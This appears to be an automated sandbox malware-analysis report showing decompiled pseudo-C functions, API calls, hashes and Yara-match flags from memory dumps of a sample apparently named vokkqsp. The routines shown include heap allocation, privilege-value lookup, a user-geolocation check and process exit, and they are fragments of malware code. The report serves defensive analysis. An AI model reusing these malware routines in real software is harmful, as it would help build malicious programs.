                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                      • Instruction ID: c26b373f7e9dcfbc1e949bd09492a6bf0a8ebf2337154de2992019c4d7549f9e
                                                      • Opcode Fuzzy Hash: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                      • Instruction Fuzzy Hash: 3290026921300003D2C07169540864A0409D7D2342F91D435A0005558DD9559869A361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                      • Instruction ID: c3b827b3f31b74d0e0caca9a2511dcdda4f382e711fed3e9a857d7da4aa8c421
                                                      • Opcode Fuzzy Hash: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                      • Instruction Fuzzy Hash: 1290027131114403D250616984047460409D7D2341F51C431A0814558ED6D59891B162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                      • Instruction ID: 2b057bafcf461e0b902f9482d1ee2a5fe4d3375714656251b7a950b0c951bc90
                                                      • Opcode Fuzzy Hash: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                      • Instruction Fuzzy Hash: CC90027120100403D24065A954086860409D7E1341F51D031A5014555FD6A59891B171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E943 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                                      C-Code - Quality: 100%
                                                      			E0041E943(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                      0x0041e946
                                                      0x0041e95d
                                                      0x0041e96b

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: w5@
                                                      • API String ID: 621844428-2048009441
                                                      • Opcode ID: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                      • Instruction ID: 28662ead1a8a2610f8e7ad364a80deeb4b3648c83f3036173ff49b3b7ba48b6c
                                                      • Opcode Fuzzy Hash: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                      • Instruction Fuzzy Hash: CAD01776A003147BCA20EB99CC85FD777ACDF457A4F0180A5BA4C5B282C675BA00C7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E935 Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 21%
                                                      			E0041E935() {

				asm("daa");
				asm("int 0xa2");
				asm("loope 0xffffff9e");
				asm("stc");
				_push(0x9f547df3);
				_t7 =  *0xFFFFFFFF8BEC8B5D;
				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
				ExitProcess( *0xFFFFFFFF8BEC8B61);
			}



                                                      0x0041e935
                                                      0x0041e938
                                                      0x0041e93a
                                                      0x0041e93c
                                                      0x0041e93d
                                                      0x0041e946
                                                      0x0041e95d
                                                      0x0041e96b

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateExitHeapProcess
                                                      • String ID:
                                                      • API String ID: 1054155344-0
                                                      • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                      • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                                      • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                      • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004098A3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420213( &_v67, 0, 0x3f);
				E00420CC3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                      0x004098a3
                                                      0x004098b4
                                                      0x004098b8
                                                      0x004098c3
                                                      0x004098c8
                                                      0x004098d3
                                                      0x004098eb
                                                      0x004098f0
                                                      0x004098f7
                                                      0x004098f9
                                                      0x00409906
                                                      0x0040990a
                                                      0x00000000
                                                      0x0040992e
                                                      0x0040990a
                                                      0x00409936

                                                      APIs
                                                      • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                      • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                                      • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                      • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E8F5 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                      • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                                      • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                      • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                                      C-Code - Quality: 100%
                                                      			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                      0x0041e8d2
                                                      0x0041e8da
                                                      0x0041e8f0
                                                      0x0041e8f4

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                      • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                                      • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                      • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004100A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                                      C-Code - Quality: 37%
                                                      			E004100A3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                      0x004100bd
                                                      0x004100c7
                                                      0x004100cd
                                                      0x004100dc
                                                      0x004100ca
                                                      0x004100ca
                                                      0x004100ca

                                                      APIs
                                                      • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: User
                                                      • String ID:
                                                      • API String ID: 765557111-0
                                                      • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                      • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                                      • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                      • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E903 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                      • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                                      • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                      • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041EA63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                      0x0041ea7d
                                                      0x0041ea93
                                                      0x0041ea97

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                      • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                                      • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                      • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                      • Instruction ID: b5498e74984cec40a2c6a38f7ece94c688bc02762c3818d5905e012efedaac04
                                                      • Opcode Fuzzy Hash: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                      • Instruction Fuzzy Hash: AFB092B29024D5CAEB51E7B04A08B2B7E04BBE6741F26C072E2020785B8778D491F6B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00A96A60 Relevance: .2, Instructions: 227COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E00A96A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xb5d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00AA9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xb56908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00AACF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00AACF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00AAD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00AAB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00AAAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00AAD000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00AAAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                      0x00a96a6f
                                                      0x00a96a72
                                                      0x00a96a78
                                                      0x00a96a7c
                                                      0x00a96a7f
                                                      0x00a96a87
                                                      0x00ad8049
                                                      0x00ad8049
                                                      0x00ad804e
                                                      0x00ad804f
                                                      0x00ad8057
                                                      0x00ad805c
                                                      0x00000000
                                                      0x00a96a8d
                                                      0x00a96a92
                                                      0x00a96a92
                                                      0x00a96a94
                                                      0x00a96a99
                                                      0x00a96a9c
                                                      0x00a96a9f
                                                      0x00a96aa2
                                                      0x00a96aaa
                                                      0x00a96ab0
                                                      0x00ad7eae
                                                      0x00ad7eb4
                                                      0x00ad7eb9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00ad7ebf
                                                      0x00ad7ebf
                                                      0x00ad7ebf
                                                      0x00ad7ec1
                                                      0x00ad7ec6
                                                      0x00000000
                                                      0x00000000
                                                      0x00ad7ece
                                                      0x00ad7edb
                                                      0x00ad7ee5
                                                      0x00ad7ee7
                                                      0x00ad7ee7
                                                      0x00ad7edd
                                                      0x00ad7edd
                                                      0x00ad7edd
                                                      0x00ad7eea
                                                      0x00ad7ed0
                                                      0x00ad7ed0
                                                      0x00ad7ed3
                                                      0x00ad7ed3
                                                      0x00ad7eec
                                                      0x00ad7ef8
                                                      0x00ad7f00
                                                      0x00ad7f07
                                                      0x00ad7f0a
                                                      0x00ad7f19
                                                      0x00ad7f1b
                                                      0x00ad7f23
                                                      0x00ad7f25
                                                      0x00ad7f28
                                                      0x00ad7f2e
                                                      0x00ad7f31
                                                      0x00ad7f34
                                                      0x00ad7f37
                                                      0x00ad7f3c
                                                      0x00000000
                                                      0x00ad7f3e
                                                      0x00ad7f3e
                                                      0x00ad7f41
                                                      0x00a96b35
                                                      0x00a96b38
                                                      0x00a96b44
                                                      0x00a96b4c
                                                      0x00a96b4e
                                                      0x00a96b51
                                                      0x00a96b69
                                                      0x00a96b69
                                                      0x00ad7f3c
                                                      0x00ad8046
                                                      0x00000000
                                                      0x00ad8046
                                                      0x00a96abc
                                                      0x00a96aca
                                                      0x00ad7f49
                                                      0x00a96b13
                                                      0x00a96b13
                                                      0x00a96b16
                                                      0x00a96b1e
                                                      0x00ad7fe7
                                                      0x00ad7fea
                                                      0x00ad7fed
                                                      0x00ad7ff0
                                                      0x00ad7ff2
                                                      0x00ad7ff4
                                                      0x00ad7ffa
                                                      0x00000000
                                                      0x00000000
                                                      0x00ad8000
                                                      0x00ad8003
                                                      0x00ad8006
                                                      0x00ad8009
                                                      0x00ad800b
                                                      0x00ad800d
                                                      0x00ad8010
                                                      0x00ad801f
                                                      0x00000000
                                                      0x00000000
                                                      0x00ad8025
                                                      0x00a96b2f
                                                      0x00a96b2f
                                                      0x00a96b32
                                                      0x00000000
                                                      0x00a96b32
                                                      0x00a96b26
                                                      0x00ad8030
                                                      0x00ad803a
                                                      0x00ad803c
                                                      0x00ad803c
                                                      0x00ad8032
                                                      0x00ad8032
                                                      0x00ad8032
                                                      0x00ad803f
                                                      0x00a96b2c
                                                      0x00a96b2c
                                                      0x00a96b2c
                                                      0x00000000
                                                      0x00a96b26
                                                      0x00a96ad0
                                                      0x00a96ad6
                                                      0x00a96ade
                                                      0x00a96ae0
                                                      0x00a96ae0
                                                      0x00a96ae5
                                                      0x00ad7f53
                                                      0x00a96aeb
                                                      0x00a96aeb
                                                      0x00a96aeb
                                                      0x00a96af3
                                                      0x00ad7f5e
                                                      0x00ad7f61
                                                      0x00ad7f68
                                                      0x00ad7f69
                                                      0x00ad7f6b
                                                      0x00ad7f70
                                                      0x00ad7f71
                                                      0x00ad7f76
                                                      0x00ad7f77
                                                      0x00ad7f7c
                                                      0x00ad7f86
                                                      0x00ad7f88
                                                      0x00ad7f8d
                                                      0x00ad7f92
                                                      0x00ad7f97
                                                      0x00ad7f98
                                                      0x00ad7f99
                                                      0x00ad7f9a
                                                      0x00ad7f9f
                                                      0x00ad7fa0
                                                      0x00ad7fa5
                                                      0x00ad7faa
                                                      0x00ad7faa
                                                      0x00ad7faf
                                                      0x00ad7fdc
                                                      0x00ad7fdf
                                                      0x00000000
                                                      0x00ad7fb1
                                                      0x00ad7fb1
                                                      0x00ad7fb3
                                                      0x00ad7fb8
                                                      0x00ad7fd4
                                                      0x00ad7fd4
                                                      0x00000000
                                                      0x00ad7fd4
                                                      0x00ad7fba
                                                      0x00ad7fbc
                                                      0x00ad7fc2
                                                      0x00ad7fc4
                                                      0x00ad7fc4
                                                      0x00ad7fc7
                                                      0x00ad7fcb
                                                      0x00ad7fcc
                                                      0x00ad7fd1
                                                      0x00000000
                                                      0x00ad7fd1
                                                      0x00a96b04
                                                      0x00a96b04
                                                      0x00a96b0b
                                                      0x00000000
                                                      0x00000000
                                                      0x00a96b11
                                                      0x00000000
                                                      0x00a96b11
                                                      0x00a96af3

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a41753f4d0d952042517882f0065179e87db28a75c7b92ba12b29c344de32d9
                                                      • Instruction ID: 46737fce3dc346f3fe7970287910b71404841d18d1fd816d3c131fe5fc0760b0
